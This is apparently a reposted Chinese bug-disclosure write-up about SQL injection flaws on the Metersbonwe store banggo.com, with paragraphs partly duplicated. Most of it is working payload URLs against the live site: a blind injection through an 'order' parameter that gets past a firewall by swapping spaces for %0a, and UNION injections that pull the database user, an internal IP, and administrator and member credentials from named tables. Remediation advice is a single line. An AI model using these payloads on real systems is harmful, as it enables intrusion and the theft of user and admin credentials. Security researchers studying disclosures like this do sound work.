美特斯邦威官方商城某盲注,赞一下厂商, 漏洞 响应很快,修复得很快,也加了防注。。找了很久才发现这小问题。。再修一下吧。。。 http://me-city.banggo.com/Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23 http://me-city.banggo.com/Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23 order 弄盲注 在when 1=1 1=2那里返回条件看出评论的排序。 http://act.banggo.com/Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175 这里应该也存在注入,不过好像利用不了,测试在后面加上各种SQL语句。注意,空格用%0a代替。。。(估计是加了防火墙) http://me-city.banggo.com/Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23 http://me-city.banggo.com/Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23 order 弄盲注 在when 1=1 1=2那里返回条件看出评论的排序。www.2cto.com http://act.banggo.com/Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175 这里应该也存在注入,不过好像利用不了,测试在后面加上各种SQL语句。注意,空格用%0a代替。。。(估计是加了防火墙) 修复方案: 再改进一下就完美了。。 第二个:美特斯邦威官方商城某union注入 详细说明:注入点: http://www.banggo.com/Ad/getAdPosListJs.s html ?position=175 http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,user%28%29%23 "open_user@10.80.30.240" 查管理员: http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,concat%28user_id,0x7c,user_name,0x7c,%20email,0x7c,password%29%20from%20system_admin_user%23 查会员(只查了自己乱注册的号,确认与会员同库): http://www.banggo.com/Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,concat%28user_id,0x7c,email,0x7c,%20user_name,0x7c,password%29%20from%20user_users%20where%20user_name%20like%200x616161616161616263%20limit%201%23 觉得商城应该会员数据与网站的分离,这样才能保证会员数据的安全性。 修复方案: 应该懂!数字型注入,注意了。。。 作者 kobin97
查看更多关于美特斯邦威官方商城某盲注和某union注入 - 网站安的详细内容...